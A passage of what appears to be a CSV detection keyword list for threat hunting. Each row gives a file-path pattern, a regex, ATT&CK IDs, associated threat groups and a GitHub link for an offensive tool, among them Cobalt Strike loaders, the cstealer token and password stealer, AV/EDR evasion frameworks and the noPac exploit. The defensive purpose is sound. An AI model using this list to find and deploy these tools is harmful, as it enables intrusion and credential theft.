"*/CSExec.py.git*",".{0,1000}\/CSExec\.py\.git.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","6307"
"*/csexecsvc.exe*",".{0,1000}\/csexecsvc\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6308"
"*/csexecsvc-net35.exe*",".{0,1000}\/csexecsvc\-net35\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6309"
"*/csexecsvc-net40.exe*",".{0,1000}\/csexecsvc\-net40\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6310"
"*/csexecsvc-net45.exe*",".{0,1000}\/csexecsvc\-net45\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6311"
"*/csharp/process_injection/*",".{0,1000}\/csharp\/process_injection\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","6312"
"*/CSharpWinRM*",".{0,1000}\/CSharpWinRM.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","6313"
"*/C--Shellcode*",".{0,1000}\/C\-\-Shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","6314"
"*/CS-Loader.go*",".{0,1000}\/CS\-Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","6315"
"*/CS-Loader/*",".{0,1000}\/CS\-Loader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","6316"
"*/CsOnTheFly.ps1*",".{0,1000}\/CsOnTheFly\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","6317"
"*/csOnvps/*",".{0,1000}\/csOnvps\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","6318"
"*/csOnvps/*",".{0,1000}\/csOnvps\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","6319"
"*/cs-rdll-ipc-example/*",".{0,1000}\/cs\-rdll\-ipc\-example\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","6320"
"*/CS-Remote-OPs-BOF*",".{0,1000}\/CS\-Remote\-OPs\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6321"
"*/cstealer.git*",".{0,1000}\/cstealer\.git.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","N/A","10","","N/A","","","","6322"
"*/cstealer.py*",".{0,1000}\/cstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","N/A","10","","N/A","","","","6323"
"*/cs-token-vault/*",".{0,1000}\/cs\-token\-vault\/.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","6324"
"*/Cstrike Rat.exe*",".{0,1000}\/Cstrike\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6325"
"*/ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Reconnaissance","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","N/A","10","2015","297","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z","6326"
"*/ctftool*",".{0,1000}ctftool.{0,1000}","offensive_tool_keyword","ctftool","This is ctftool. an interactive command line tool to experiment with CTF. a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. debugging complex issues with Text Input Processors and analyzing Windows security.","T1547.001 - T1059 - T1057","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/taviso/ctftool","1","0","N/A","N/A","N/A","10","1655","269","2021-09-17T21:02:25Z","2019-06-07T03:39:10Z","6327"
"*/cube0x0/noPac*",".{0,1000}\/cube0x0\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/cube0x0/noPac","1","1","N/A","N/A","N/A","10","1365","323","2021-12-16T09:50:15Z","2021-12-11T19:27:30Z","6328"
"*/cuddlephish.git*",".{0,1000}\/cuddlephish\.git.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","6329"
"*/cuddlephish.html*",".{0,1000}\/cuddlephish\.html.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","6330"
"*/cups-info.nse*",".{0,1000}\/cups\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6331"
"*/cups-queue-info.nse*",".{0,1000}\/cups\-queue\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6332"
"*/curl.cna",".{0,1000}\/curl\.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","6333"
"*/curl.x64.o",".{0,1000}\/curl\.x64\.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","6334"
